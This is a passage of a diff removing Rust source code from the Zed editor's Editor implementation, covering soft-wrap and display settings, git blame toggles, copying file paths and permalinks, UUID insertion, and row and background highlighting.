|display_map, cx| { - display_map.remove_blocks(block_ids, cx) - }); - if let Some(autoscroll) = autoscroll { - self.request_autoscroll(autoscroll, cx); - } - cx.notify(); - } - - pub fn row_for_block( - &self, - block_id: CustomBlockId, - cx: &mut Context, - ) -> Option { - self.display_map - .update(cx, |map, cx| map.row_for_block(block_id, cx)) - } - - pub(crate) fn set_focused_block(&mut self, focused_block: FocusedBlock) { - self.focused_block = Some(focused_block); - } - - pub(crate) fn take_focused_block(&mut self) -> Option { - self.focused_block.take() - } - - pub fn insert_creases( - &mut self, - creases: impl IntoIterator>, - cx: &mut Context, - ) -> Vec { - self.display_map - .update(cx, |map, cx| map.insert_creases(creases, cx)) - } - - pub fn remove_creases( - &mut self, - ids: impl IntoIterator, - cx: &mut Context, - ) { - self.display_map - .update(cx, |map, cx| map.remove_creases(ids, cx)); - } - - pub fn longest_row(&self, cx: &mut App) -> DisplayRow { - self.display_map - .update(cx, |map, cx| map.snapshot(cx)) - .longest_row() - } - - pub fn max_point(&self, cx: &mut App) -> DisplayPoint { - self.display_map - .update(cx, |map, cx| map.snapshot(cx)) - .max_point() - } - - pub fn text(&self, cx: &App) -> String { - self.buffer.read(cx).read(cx).text() - } - - pub fn is_empty(&self, cx: &App) -> bool { - self.buffer.read(cx).read(cx).is_empty() - } - - pub fn text_option(&self, cx: &App) -> Option { - let text = self.text(cx); - let text = text.trim(); - - if text.is_empty() { - return None; - } - - Some(text.to_string()) - } - - pub fn set_text( - &mut self, - text: impl Into>, - window: &mut Window, - cx: &mut Context, - ) { - self.transact(window, cx, |this, _, cx| { - this.buffer - .read(cx) - .as_singleton() - .expect("you can only call set_text on editors for singleton buffers") - .update(cx, |buffer, cx| buffer.set_text(text, cx)); - }); - } - - pub fn display_text(&self, cx: &mut App) -> String { - self.display_map - .update(cx, |map, cx| map.snapshot(cx)) - .text() - } - - pub fn wrap_guides(&self, cx: &App) -> SmallVec<[(usize, bool); 2]> { - let mut wrap_guides = smallvec::smallvec![]; - - if self.show_wrap_guides == Some(false) { - return wrap_guides; - } - - let settings = self.buffer.read(cx).language_settings(cx); - if settings.show_wrap_guides { - match self.soft_wrap_mode(cx) { - SoftWrap::Column(soft_wrap) => { - wrap_guides.push((soft_wrap as usize, true)); - } - SoftWrap::Bounded(soft_wrap) => { - wrap_guides.push((soft_wrap as usize, true)); - } - SoftWrap::GitDiff | SoftWrap::None | SoftWrap::EditorWidth => {} - } - wrap_guides.extend(settings.wrap_guides.iter().map(|guide| (*guide, false))) - } - - wrap_guides - } - - pub fn soft_wrap_mode(&self, cx: &App) -> SoftWrap { - let settings = self.buffer.read(cx).language_settings(cx); - let mode = self.soft_wrap_mode_override.unwrap_or(settings.soft_wrap); - match mode { - language_settings::SoftWrap::PreferLine | language_settings::SoftWrap::None => { - SoftWrap::None - } - language_settings::SoftWrap::EditorWidth => SoftWrap::EditorWidth, - language_settings::SoftWrap::PreferredLineLength => { - SoftWrap::Column(settings.preferred_line_length) - } - language_settings::SoftWrap::Bounded => { - SoftWrap::Bounded(settings.preferred_line_length) - } - } - } - - pub fn set_soft_wrap_mode( - &mut self, - mode: language_settings::SoftWrap, - - cx: &mut Context, - ) { - self.soft_wrap_mode_override = Some(mode); - cx.notify(); - } - - pub fn set_hard_wrap(&mut self, hard_wrap: Option, cx: &mut Context) { - self.hard_wrap = hard_wrap; - cx.notify(); - } - - pub fn set_text_style_refinement(&mut self, style: TextStyleRefinement) { - self.text_style_refinement = Some(style); - } - - /// called by the Element so we know what style we were most recently rendered with. - pub(crate) fn set_style( - &mut self, - style: EditorStyle, - window: &mut Window, - cx: &mut Context, - ) { - let rem_size = window.rem_size(); - self.display_map.update(cx, |map, cx| { - map.set_font( - style.text.font(), - style.text.font_size.to_pixels(rem_size), - cx, - ) - }); - self.style = Some(style); - } - - pub fn style(&self) -> Option<&EditorStyle> { - self.style.as_ref() - } - - // Called by the element. This method is not designed to be called outside of the editor - // element's layout code because it does not notify when rewrapping is computed synchronously. - pub(crate) fn set_wrap_width(&self, width: Option, cx: &mut App) -> bool { - self.display_map - .update(cx, |map, cx| map.set_wrap_width(width, cx)) - } - - pub fn set_soft_wrap(&mut self) { - self.soft_wrap_mode_override = Some(language_settings::SoftWrap::EditorWidth) - } - - pub fn toggle_soft_wrap(&mut self, _: &ToggleSoftWrap, _: &mut Window, cx: &mut Context) { - if self.soft_wrap_mode_override.is_some() { - self.soft_wrap_mode_override.take(); - } else { - let soft_wrap = match self.soft_wrap_mode(cx) { - SoftWrap::GitDiff => return, - SoftWrap::None => language_settings::SoftWrap::EditorWidth, - SoftWrap::EditorWidth | SoftWrap::Column(_) | SoftWrap::Bounded(_) => { - language_settings::SoftWrap::None - } - }; - self.soft_wrap_mode_override = Some(soft_wrap); - } - cx.notify(); - } - - pub fn toggle_tab_bar(&mut self, _: &ToggleTabBar, _: &mut Window, cx: &mut Context) { - let Some(workspace) = self.workspace() else { - return; - }; - let fs = workspace.read(cx).app_state().fs.clone(); - let current_show = TabBarSettings::get_global(cx).show; - update_settings_file::(fs, cx, move |setting, _| { - setting.show = Some(!current_show); - }); - } - - pub fn toggle_indent_guides( - &mut self, - _: &ToggleIndentGuides, - _: &mut Window, - cx: &mut Context, - ) { - let currently_enabled = self.should_show_indent_guides().unwrap_or_else(|| { - self.buffer - .read(cx) - .language_settings(cx) - .indent_guides - .enabled - }); - self.show_indent_guides = Some(!currently_enabled); - cx.notify(); - } - - fn should_show_indent_guides(&self) -> Option { - self.show_indent_guides - } - - pub fn toggle_line_numbers( - &mut self, - _: &ToggleLineNumbers, - _: &mut Window, - cx: &mut Context, - ) { - let mut editor_settings = EditorSettings::get_global(cx).clone(); - editor_settings.gutter.line_numbers = !editor_settings.gutter.line_numbers; - EditorSettings::override_global(editor_settings, cx); - } - - pub fn line_numbers_enabled(&self, cx: &App) -> bool { - if let Some(show_line_numbers) = self.show_line_numbers { - return show_line_numbers; - } - EditorSettings::get_global(cx).gutter.line_numbers - } - - pub fn should_use_relative_line_numbers(&self, cx: &mut App) -> bool { - self.use_relative_line_numbers - .unwrap_or(EditorSettings::get_global(cx).relative_line_numbers) - } - - pub fn toggle_relative_line_numbers( - &mut self, - _: &ToggleRelativeLineNumbers, - _: &mut Window, - cx: &mut Context, - ) { - let is_relative = self.should_use_relative_line_numbers(cx); - self.set_relative_line_number(Some(!is_relative), cx) - } - - pub fn set_relative_line_number(&mut self, is_relative: Option, cx: &mut Context) { - self.use_relative_line_numbers = is_relative; - cx.notify(); - } - - pub fn set_show_gutter(&mut self, show_gutter: bool, cx: &mut Context) { - self.show_gutter = show_gutter; - cx.notify(); - } - - pub fn set_show_scrollbars(&mut self, show_scrollbars: bool, cx: &mut Context) { - self.show_scrollbars = show_scrollbars; - cx.notify(); - } - - pub fn disable_scrolling(&mut self, cx: &mut Context) { - self.disable_scrolling = true; - cx.notify(); - } - - pub fn set_show_line_numbers(&mut self, show_line_numbers: bool, cx: &mut Context) { - self.show_line_numbers = Some(show_line_numbers); - cx.notify(); - } - - pub fn disable_expand_excerpt_buttons(&mut self, cx: &mut Context) { - self.disable_expand_excerpt_buttons = true; - cx.notify(); - } - - pub fn set_show_git_diff_gutter(&mut self, show_git_diff_gutter: bool, cx: &mut Context) { - self.show_git_diff_gutter = Some(show_git_diff_gutter); - cx.notify(); - } - - pub fn set_show_code_actions(&mut self, show_code_actions: bool, cx: &mut Context) { - self.show_code_actions = Some(show_code_actions); - cx.notify(); - } - - pub fn set_show_runnables(&mut self, show_runnables: bool, cx: &mut Context) { - self.show_runnables = Some(show_runnables); - cx.notify(); - } - - pub fn set_show_breakpoints(&mut self, show_breakpoints: bool, cx: &mut Context) { - self.show_breakpoints = Some(show_breakpoints); - cx.notify(); - } - - pub fn set_masked(&mut self, masked: bool, cx: &mut Context) { - if self.display_map.read(cx).masked != masked { - self.display_map.update(cx, |map, _| map.masked = masked); - } - cx.notify() - } - - pub fn set_show_wrap_guides(&mut self, show_wrap_guides: bool, cx: &mut Context) { - self.show_wrap_guides = Some(show_wrap_guides); - cx.notify(); - } - - pub fn set_show_indent_guides(&mut self, show_indent_guides: bool, cx: &mut Context) { - self.show_indent_guides = Some(show_indent_guides); - cx.notify(); - } - - pub fn working_directory(&self, cx: &App) -> Option { - if let Some(buffer) = self.buffer().read(cx).as_singleton() { - if let Some(file) = buffer.read(cx).file().and_then(|f| f.as_local()) { - if let Some(dir) = file.abs_path(cx).parent() { - return Some(dir.to_owned()); - } - } - - if let Some(project_path) = buffer.read(cx).project_path(cx) { - return Some(project_path.path.to_path_buf()); - } - } - - None - } - - fn target_file<'a>(&self, cx: &'a App) -> Option<&'a dyn language::LocalFile> { - self.active_excerpt(cx)? - .1 - .read(cx) - .file() - .and_then(|f| f.as_local()) - } - - pub fn target_file_abs_path(&self, cx: &mut Context) -> Option { - self.active_excerpt(cx).and_then(|(_, buffer, _)| { - let buffer = buffer.read(cx); - if let Some(project_path) = buffer.project_path(cx) { - let project = self.project.as_ref()?.read(cx); - project.absolute_path(&project_path, cx) - } else { - buffer - .file() - .and_then(|file| file.as_local().map(|file| file.abs_path(cx))) - } - }) - } - - fn target_file_path(&self, cx: &mut Context) -> Option { - self.active_excerpt(cx).and_then(|(_, buffer, _)| { - let project_path = buffer.read(cx).project_path(cx)?; - let project = self.project.as_ref()?.read(cx); - let entry = project.entry_for_path(&project_path, cx)?; - let path = entry.path.to_path_buf(); - Some(path) - }) - } - - pub fn reveal_in_finder( - &mut self, - _: &RevealInFileManager, - _window: &mut Window, - cx: &mut Context, - ) { - if let Some(target) = self.target_file(cx) { - cx.reveal_path(&target.abs_path(cx)); - } - } - - pub fn copy_path( - &mut self, - _: &zed_actions::workspace::CopyPath, - _window: &mut Window, - cx: &mut Context, - ) { - if let Some(path) = self.target_file_abs_path(cx) { - if let Some(path) = path.to_str() { - cx.write_to_clipboard(ClipboardItem::new_string(path.to_string())); - } - } - } - - pub fn copy_relative_path( - &mut self, - _: &zed_actions::workspace::CopyRelativePath, - _window: &mut Window, - cx: &mut Context, - ) { - if let Some(path) = self.target_file_path(cx) { - if let Some(path) = path.to_str() { - cx.write_to_clipboard(ClipboardItem::new_string(path.to_string())); - } - } - } - - pub fn project_path(&self, cx: &App) -> Option { - if let Some(buffer) = self.buffer.read(cx).as_singleton() { - buffer.read(cx).project_path(cx) - } else { - None - } - } - - // Returns true if the editor handled a go-to-line request - pub fn go_to_active_debug_line(&mut self, window: &mut Window, cx: &mut Context) -> bool { - maybe!({ - let breakpoint_store = self.breakpoint_store.as_ref()?; - - let Some(active_stack_frame) = breakpoint_store.read(cx).active_position().cloned() - else { - self.clear_row_highlights::(); - return None; - }; - - let position = active_stack_frame.position; - let buffer_id = position.buffer_id?; - let snapshot = self - .project - .as_ref()? - .read(cx) - .buffer_for_id(buffer_id, cx)? - .read(cx) - .snapshot(); - - let mut handled = false; - for (id, ExcerptRange { context, .. }) in - self.buffer.read(cx).excerpts_for_buffer(buffer_id, cx) - { - if context.start.cmp(&position, &snapshot).is_ge() - || context.end.cmp(&position, &snapshot).is_lt() - { - continue; - } - let snapshot = self.buffer.read(cx).snapshot(cx); - let multibuffer_anchor = snapshot.anchor_in_excerpt(id, position)?; - - handled = true; - self.clear_row_highlights::(); - self.go_to_line::( - multibuffer_anchor, - Some(cx.theme().colors().editor_debugger_active_line_background), - window, - cx, - ); - - cx.notify(); - } - - handled.then_some(()) - }) - .is_some() - } - - pub fn copy_file_name_without_extension( - &mut self, - _: &CopyFileNameWithoutExtension, - _: &mut Window, - cx: &mut Context, - ) { - if let Some(file) = self.target_file(cx) { - if let Some(file_stem) = file.path().file_stem() { - if let Some(name) = file_stem.to_str() { - cx.write_to_clipboard(ClipboardItem::new_string(name.to_string())); - } - } - } - } - - pub fn copy_file_name(&mut self, _: &CopyFileName, _: &mut Window, cx: &mut Context) { - if let Some(file) = self.target_file(cx) { - if let Some(file_name) = file.path().file_name() { - if let Some(name) = file_name.to_str() { - cx.write_to_clipboard(ClipboardItem::new_string(name.to_string())); - } - } - } - } - - pub fn toggle_git_blame( - &mut self, - _: &::git::Blame, - window: &mut Window, - cx: &mut Context, - ) { - self.show_git_blame_gutter = !self.show_git_blame_gutter; - - if self.show_git_blame_gutter && !self.has_blame_entries(cx) { - self.start_git_blame(true, window, cx); - } - - cx.notify(); - } - - pub fn toggle_git_blame_inline( - &mut self, - _: &ToggleGitBlameInline, - window: &mut Window, - cx: &mut Context, - ) { - self.toggle_git_blame_inline_internal(true, window, cx); - cx.notify(); - } - - pub fn open_git_blame_commit( - &mut self, - _: &OpenGitBlameCommit, - window: &mut Window, - cx: &mut Context, - ) { - self.open_git_blame_commit_internal(window, cx); - } - - fn open_git_blame_commit_internal( - &mut self, - window: &mut Window, - cx: &mut Context, - ) -> Option<()> { - let blame = self.blame.as_ref()?; - let snapshot = self.snapshot(window, cx); - let cursor = self.selections.newest::(cx).head(); - let (buffer, point, _) = snapshot.buffer_snapshot.point_to_buffer_point(cursor)?; - let blame_entry = blame - .update(cx, |blame, cx| { - blame - .blame_for_rows( - &[RowInfo { - buffer_id: Some(buffer.remote_id()), - buffer_row: Some(point.row), - ..Default::default() - }], - cx, - ) - .next() - }) - .flatten()?; - let renderer = cx.global::().0.clone(); - let repo = blame.read(cx).repository(cx)?; - let workspace = self.workspace()?.downgrade(); - renderer.open_blame_commit(blame_entry, repo, workspace, window, cx); - None - } - - pub fn git_blame_inline_enabled(&self) -> bool { - self.git_blame_inline_enabled - } - - pub fn toggle_selection_menu( - &mut self, - _: &ToggleSelectionMenu, - _: &mut Window, - cx: &mut Context, - ) { - self.show_selection_menu = self - .show_selection_menu - .map(|show_selections_menu| !show_selections_menu) - .or_else(|| Some(!EditorSettings::get_global(cx).toolbar.selections_menu)); - - cx.notify(); - } - - pub fn selection_menu_enabled(&self, cx: &App) -> bool { - self.show_selection_menu - .unwrap_or_else(|| EditorSettings::get_global(cx).toolbar.selections_menu) - } - - fn start_git_blame( - &mut self, - user_triggered: bool, - window: &mut Window, - cx: &mut Context, - ) { - if let Some(project) = self.project.as_ref() { - let Some(buffer) = self.buffer().read(cx).as_singleton() else { - return; - }; - - if buffer.read(cx).file().is_none() { - return; - } - - let focused = self.focus_handle(cx).contains_focused(window, cx); - - let project = project.clone(); - let blame = cx.new(|cx| GitBlame::new(buffer, project, user_triggered, focused, cx)); - self.blame_subscription = - Some(cx.observe_in(&blame, window, |_, _, _, cx| cx.notify())); - self.blame = Some(blame); - } - } - - fn toggle_git_blame_inline_internal( - &mut self, - user_triggered: bool, - window: &mut Window, - cx: &mut Context, - ) { - if self.git_blame_inline_enabled { - self.git_blame_inline_enabled = false; - self.show_git_blame_inline = false; - self.show_git_blame_inline_delay_task.take(); - } else { - self.git_blame_inline_enabled = true; - self.start_git_blame_inline(user_triggered, window, cx); - } - - cx.notify(); - } - - fn start_git_blame_inline( - &mut self, - user_triggered: bool, - window: &mut Window, - cx: &mut Context, - ) { - self.start_git_blame(user_triggered, window, cx); - - if ProjectSettings::get_global(cx) - .git - .inline_blame_delay() - .is_some() - { - self.start_inline_blame_timer(window, cx); - } else { - self.show_git_blame_inline = true - } - } - - pub fn blame(&self) -> Option<&Entity> { - self.blame.as_ref() - } - - pub fn show_git_blame_gutter(&self) -> bool { - self.show_git_blame_gutter - } - - pub fn render_git_blame_gutter(&self, cx: &App) -> bool { - self.show_git_blame_gutter && self.has_blame_entries(cx) - } - - pub fn render_git_blame_inline(&self, window: &Window, cx: &App) -> bool { - self.show_git_blame_inline - && (self.focus_handle.is_focused(window) || self.inline_blame_popover.is_some()) - && !self.newest_selection_head_on_empty_line(cx) - && self.has_blame_entries(cx) - } - - fn has_blame_entries(&self, cx: &App) -> bool { - self.blame() - .map_or(false, |blame| blame.read(cx).has_generated_entries()) - } - - fn newest_selection_head_on_empty_line(&self, cx: &App) -> bool { - let cursor_anchor = self.selections.newest_anchor().head(); - - let snapshot = self.buffer.read(cx).snapshot(cx); - let buffer_row = MultiBufferRow(cursor_anchor.to_point(&snapshot).row); - - snapshot.line_len(buffer_row) == 0 - } - - fn get_permalink_to_line(&self, cx: &mut Context) -> Task> { - let buffer_and_selection = maybe!({ - let selection = self.selections.newest::(cx); - let selection_range = selection.range(); - - let multi_buffer = self.buffer().read(cx); - let multi_buffer_snapshot = multi_buffer.snapshot(cx); - let buffer_ranges = multi_buffer_snapshot.range_to_buffer_ranges(selection_range); - - let (buffer, range, _) = if selection.reversed { - buffer_ranges.first() - } else { - buffer_ranges.last() - }?; - - let selection = text::ToPoint::to_point(&range.start, &buffer).row - ..text::ToPoint::to_point(&range.end, &buffer).row; - Some(( - multi_buffer.buffer(buffer.remote_id()).unwrap().clone(), - selection, - )) - }); - - let Some((buffer, selection)) = buffer_and_selection else { - return Task::ready(Err(anyhow!("failed to determine buffer and selection"))); - }; - - let Some(project) = self.project.as_ref() else { - return Task::ready(Err(anyhow!("editor does not have project"))); - }; - - project.update(cx, |project, cx| { - project.get_permalink_to_line(&buffer, selection, cx) - }) - } - - pub fn copy_permalink_to_line( - &mut self, - _: &CopyPermalinkToLine, - window: &mut Window, - cx: &mut Context, - ) { - let permalink_task = self.get_permalink_to_line(cx); - let workspace = self.workspace(); - - cx.spawn_in(window, async move |_, cx| match permalink_task.await { - Ok(permalink) => { - cx.update(|_, cx| { - cx.write_to_clipboard(ClipboardItem::new_string(permalink.to_string())); - }) - .ok(); - } - Err(err) => { - let message = format!("Failed to copy permalink: {err}"); - - anyhow::Result::<()>::Err(err).log_err(); - - if let Some(workspace) = workspace { - workspace - .update_in(cx, |workspace, _, cx| { - struct CopyPermalinkToLine; - - workspace.show_toast( - Toast::new( - NotificationId::unique::(), - message, - ), - cx, - ) - }) - .ok(); - } - } - }) - .detach(); - } - - pub fn copy_file_location( - &mut self, - _: &CopyFileLocation, - _: &mut Window, - cx: &mut Context, - ) { - let selection = self.selections.newest::(cx).start.row + 1; - if let Some(file) = self.target_file(cx) { - if let Some(path) = file.path().to_str() { - cx.write_to_clipboard(ClipboardItem::new_string(format!("{path}:{selection}"))); - } - } - } - - pub fn open_permalink_to_line( - &mut self, - _: &OpenPermalinkToLine, - window: &mut Window, - cx: &mut Context, - ) { - let permalink_task = self.get_permalink_to_line(cx); - let workspace = self.workspace(); - - cx.spawn_in(window, async move |_, cx| match permalink_task.await { - Ok(permalink) => { - cx.update(|_, cx| { - cx.open_url(permalink.as_ref()); - }) - .ok(); - } - Err(err) => { - let message = format!("Failed to open permalink: {err}"); - - anyhow::Result::<()>::Err(err).log_err(); - - if let Some(workspace) = workspace { - workspace - .update(cx, |workspace, cx| { - struct OpenPermalinkToLine; - - workspace.show_toast( - Toast::new( - NotificationId::unique::(), - message, - ), - cx, - ) - }) - .ok(); - } - } - }) - .detach(); - } - - pub fn insert_uuid_v4( - &mut self, - _: &InsertUuidV4, - window: &mut Window, - cx: &mut Context, - ) { - self.insert_uuid(UuidVersion::V4, window, cx); - } - - pub fn insert_uuid_v7( - &mut self, - _: &InsertUuidV7, - window: &mut Window, - cx: &mut Context, - ) { - self.insert_uuid(UuidVersion::V7, window, cx); - } - - fn insert_uuid(&mut self, version: UuidVersion, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - self.transact(window, cx, |this, window, cx| { - let edits = this - .selections - .all::(cx) - .into_iter() - .map(|selection| { - let uuid = match version { - UuidVersion::V4 => uuid::Uuid::new_v4(), - UuidVersion::V7 => uuid::Uuid::now_v7(), - }; - - (selection.range(), uuid.to_string()) - }); - this.edit(edits, cx); - this.refresh_inline_completion(true, false, window, cx); - }); - } - - pub fn open_selections_in_multibuffer( - &mut self, - _: &OpenSelectionsInMultibuffer, - window: &mut Window, - cx: &mut Context, - ) { - let multibuffer = self.buffer.read(cx); - - let Some(buffer) = multibuffer.as_singleton() else { - return; - }; - - let Some(workspace) = self.workspace() else { - return; - }; - - let locations = self - .selections - .disjoint_anchors() - .iter() - .map(|range| Location { - buffer: buffer.clone(), - range: range.start.text_anchor..range.end.text_anchor, - }) - .collect::>(); - - let title = multibuffer.title(cx).to_string(); - - cx.spawn_in(window, async move |_, cx| { - workspace.update_in(cx, |workspace, window, cx| { - Self::open_locations_in_multibuffer( - workspace, - locations, - format!("Selections for '{title}'"), - false, - MultibufferSelectionMode::All, - window, - cx, - ); - }) - }) - .detach(); - } - - /// Adds a row highlight for the given range. If a row has multiple highlights, the - /// last highlight added will be used. - /// - /// If the range ends at the beginning of a line, then that line will not be highlighted. - pub fn highlight_rows( - &mut self, - range: Range, - color: Hsla, - options: RowHighlightOptions, - cx: &mut Context, - ) { - let snapshot = self.buffer().read(cx).snapshot(cx); - let row_highlights = self.highlighted_rows.entry(TypeId::of::()).or_default(); - let ix = row_highlights.binary_search_by(|highlight| { - Ordering::Equal - .then_with(|| highlight.range.start.cmp(&range.start, &snapshot)) - .then_with(|| highlight.range.end.cmp(&range.end, &snapshot)) - }); - - if let Err(mut ix) = ix { - let index = post_inc(&mut self.highlight_order); - - // If this range intersects with the preceding highlight, then merge it with - // the preceding highlight. Otherwise insert a new highlight. - let mut merged = false; - if ix > 0 { - let prev_highlight = &mut row_highlights[ix - 1]; - if prev_highlight - .range - .end - .cmp(&range.start, &snapshot) - .is_ge() - { - ix -= 1; - if prev_highlight.range.end.cmp(&range.end, &snapshot).is_lt() { - prev_highlight.range.end = range.end; - } - merged = true; - prev_highlight.index = index; - prev_highlight.color = color; - prev_highlight.options = options; - } - } - - if !merged { - row_highlights.insert( - ix, - RowHighlight { - range: range.clone(), - index, - color, - options, - type_id: TypeId::of::(), - }, - ); - } - - // If any of the following highlights intersect with this one, merge them. - while let Some(next_highlight) = row_highlights.get(ix + 1) { - let highlight = &row_highlights[ix]; - if next_highlight - .range - .start - .cmp(&highlight.range.end, &snapshot) - .is_le() - { - if next_highlight - .range - .end - .cmp(&highlight.range.end, &snapshot) - .is_gt() - { - row_highlights[ix].range.end = next_highlight.range.end; - } - row_highlights.remove(ix + 1); - } else { - break; - } - } - } - } - - /// Remove any highlighted row ranges of the given type that intersect the - /// given ranges. - pub fn remove_highlighted_rows( - &mut self, - ranges_to_remove: Vec>, - cx: &mut Context, - ) { - let snapshot = self.buffer().read(cx).snapshot(cx); - let row_highlights = self.highlighted_rows.entry(TypeId::of::()).or_default(); - let mut ranges_to_remove = ranges_to_remove.iter().peekable(); - row_highlights.retain(|highlight| { - while let Some(range_to_remove) = ranges_to_remove.peek() { - match range_to_remove.end.cmp(&highlight.range.start, &snapshot) { - Ordering::Less | Ordering::Equal => { - ranges_to_remove.next(); - } - Ordering::Greater => { - match range_to_remove.start.cmp(&highlight.range.end, &snapshot) { - Ordering::Less | Ordering::Equal => { - return false; - } - Ordering::Greater => break, - } - } - } - } - - true - }) - } - - /// Clear all anchor ranges for a certain highlight context type, so no corresponding rows will be highlighted. - pub fn clear_row_highlights(&mut self) { - self.highlighted_rows.remove(&TypeId::of::()); - } - - /// For a highlight given context type, gets all anchor ranges that will be used for row highlighting. - pub fn highlighted_rows(&self) -> impl '_ + Iterator, Hsla)> { - self.highlighted_rows - .get(&TypeId::of::()) - .map_or(&[] as &[_], |vec| vec.as_slice()) - .iter() - .map(|highlight| (highlight.range.clone(), highlight.color)) - } - - /// Merges all anchor ranges for all context types ever set, picking the last highlight added in case of a row conflict. - /// Returns a map of display rows that are highlighted and their corresponding highlight color. - /// Allows to ignore certain kinds of highlights. - pub fn highlighted_display_rows( - &self, - window: &mut Window, - cx: &mut App, - ) -> BTreeMap { - let snapshot = self.snapshot(window, cx); - let mut used_highlight_orders = HashMap::default(); - self.highlighted_rows - .iter() - .flat_map(|(_, highlighted_rows)| highlighted_rows.iter()) - .fold( - BTreeMap::::new(), - |mut unique_rows, highlight| { - let start = highlight.range.start.to_display_point(&snapshot); - let end = highlight.range.end.to_display_point(&snapshot); - let start_row = start.row().0; - let end_row = if highlight.range.end.text_anchor != text::Anchor::MAX - && end.column() == 0 - { - end.row().0.saturating_sub(1) - } else { - end.row().0 - }; - for row in start_row..=end_row { - let used_index = - used_highlight_orders.entry(row).or_insert(highlight.index); - if highlight.index >= *used_index { - *used_index = highlight.index; - unique_rows.insert( - DisplayRow(row), - LineHighlight { - include_gutter: highlight.options.include_gutter, - border: None, - background: highlight.color.into(), - type_id: Some(highlight.type_id), - }, - ); - } - } - unique_rows - }, - ) - } - - pub fn highlighted_display_row_for_autoscroll( - &self, - snapshot: &DisplaySnapshot, - ) -> Option { - self.highlighted_rows - .values() - .flat_map(|highlighted_rows| highlighted_rows.iter()) - .filter_map(|highlight| { - if highlight.options.autoscroll { - Some(highlight.range.start.to_display_point(snapshot).row()) - } else { - None - } - }) - .min() - } - - pub fn set_search_within_ranges(&mut self, ranges: &[Range], cx: &mut Context) { - self.highlight_background::( - ranges, - |colors| colors.editor_document_highlight_read_background, - cx, - ) - } - - pub fn set_breadcrumb_header(&mut self, new_header: String) { - self.breadcrumb_header = Some(new_header); - } - - pub fn clear_search_within_ranges(&mut self, cx: &mut Context) { - self.clear_background_highlights::(cx); - } - - pub fn highlight_background( - &mut self, - ranges: &[Range], - color_fetcher: fn(&ThemeColors) -> Hsla, - cx: &mut Context, - ) { - self.background_highlights - .insert(TypeId::of::(), (color_fetcher, Arc::from(ranges))); - self.scrollbar_marker_state.dirty = true; - cx.notify(); - } - - pub fn clear_background_highlights( - &mut self, - cx: &mut Context, - ) -> Option { - let text_highlights = self.background_highlights.remove(&TypeId::of::())?; - if !text_highlights.1.is_empty() { - self.scrollbar_marker_state.dirty = true; - cx.notify(); - } - Some(text_highlights) - } - - pub fn highlight_gutter( - &mut self, - ranges: &[Range], - color_fetcher: fn(&App) -> Hsla, - cx: &mut Context, - ) { - self.gutter_highlights - .insert(TypeId::of::(), (color_fetcher, Arc::from(ranges))); - cx.notify(); - } - - pub fn clear_gutter_highlights( - &mut self, - cx: &mut Context, - ) -> Option { - cx.notify(); - self.gutter_highlights.remove(&TypeId::of::()) - } - - #[cfg(feature = "test-support")] - pub fn all_text_background_highlights( - &self, - window: &mut Window, - cx: &mut Context, - ) -> Vec<(Range, Hsla)> { - let snapshot = self.snapshot(window, cx); - let buffer = &snapshot.buffer_snapshot; - let start = buffer.anchor_before(0); - let end = buffer.anchor_after(buffer.len()); - let theme = cx.theme().colors(); - self.background_highlights_in_range(start..end, &snapshot, theme) - } - - #[cfg(feature = "test-support")] - pub fn search_background_highlights(&mut self, cx: &mut Context) -> Vec> { - let snapshot = self.buffer().read(cx).snapshot(cx); - - let highlights = self - .background_highlights - .get(&TypeId::of::()); - - if let Some((_color, ranges)) = highlights { - ranges - .iter() - .map(|range| range.start.to_point(&snapshot)..range.end.to_point(&snapshot)) - .collect_vec() - } else { - vec![] - } - } - - fn document_highlights_for_position<'a>( - &'a self, - position: Anchor, - buffer: &'a MultiBufferSnapshot, - ) -> impl 'a + Iterator> { - let read_highlights = self - .background_highlights - .get(&TypeId::of::()) - .map(|h| &h.1); - let write_highlights = self - .background_highlights - .get(&TypeId::of::()) - .map(|h| &h.1); - let left_position = position.bias_left(buffer); - let right_position = position.bias_right(buffer); - read_highlights - .into_iter() - .chain(write_highlights) - .flat_map(move |ranges| { - let start_ix = match ranges.binary_search_by(|probe| { - let cmp = probe.end.cmp(&left_position, buffer); - if cmp.is_ge() { - Ordering::Greater - } else { - Ordering::Less - } - }) { - Ok(i) | Err(i) => i, - }; - - ranges[start_ix..] - .iter() - .take_while(move |range| range.start.cmp(&right_position, buffer).is_le()) - }) - } - - pub fn has_background_highlights(&self) -> bool { - self.background_highlights - .get(&TypeId::of::()) - .map_or(false, |(_, highlights)| !highlights.is_empty()) - } - - pub fn background_highlights_in_range( - &self, - search_range: Range, - display_snapshot: &DisplaySnapshot, - theme: &ThemeColors, - ) -> Vec<(Range, Hsla)> { - let mut results = Vec::new(); - for (color_fetcher, ranges) in self.background_highlights.values() { - let color = color_fetcher(theme); - let start_ix = match ranges.binary_search_by(|probe| { - let cmp = probe - .end - .cmp(&search_range.start, &display_snapshot.buffer_snapshot); - if cmp.is_gt() { - Ordering::Greater - } else { - Ordering::Less - } - }) { - Ok(i) | Err(i) => i, - }; - for range in &ranges[start_ix..] { - if range - .start - .cmp(&search_range.end, &display_snapshot.buffer_snapshot) - .is_ge() - { - break; - } - - let start = range.start.to_display_point(display_snapshot); - let end = range.end.to_display_point(display_snapshot); - results.push((start..end, color)) - } - } - results - } - - pub fn background_highlight_row_ranges( - &self, - search_range: Range, - display_snapshot: &DisplaySnapshot, - count: usize, - ) -> Vec> { - let mut results = Vec::new(); - let Some((_, ranges)) = self.background_highlights.get(&TypeId::of::()) else { - return vec![]; - }; - - let start_ix = match ranges.binary_search_by(|probe| { - let cmp = probe - .end - .cmp(&search_range.start, &display_snapshot.buffer_snapshot); - if cmp.is_gt() { - Ordering::Greater - } else { - Ordering::Less - } - }) { - Ok(i) | Err(i) => i, - }; - let mut push_region = |start: Option, end: Option| { - if let (Some(start_display), Some(end_display)) = (start, end) { - results.push( - start_display.to_display_point(display_snapshot) - ..=end_display.to_display_point(display_snapshot), - ); - } - }; - let mut start_row: Option = None; - let mut end_row: Option = None; - if ranges.len() > count { - return Vec::new(); - } - for range in &ranges[start_ix..] { - if range - .start - .cmp(&search_range.end, &display_snapshot.buffer_snapshot) - .is_ge() - { - break; - } - let end = range.end.to_point(&display_snapshot.buffer_snapshot); - if let Some(current_row) = &end_row { - if end.row == current_row.row { - continue; - } - } - let start = range.start.to_point(&display_snapshot.buffer_snapshot); - if start_row.is_none() { - assert_eq!(end_row, None); - start_row = Some(start); - end_row = Some(end); - continue; - } - if let Some(current_end) = end_row.as_mut() { - if start.row > current_end.row + 1 { - push_region(start_row, end_row); - start_row = Some(start); - 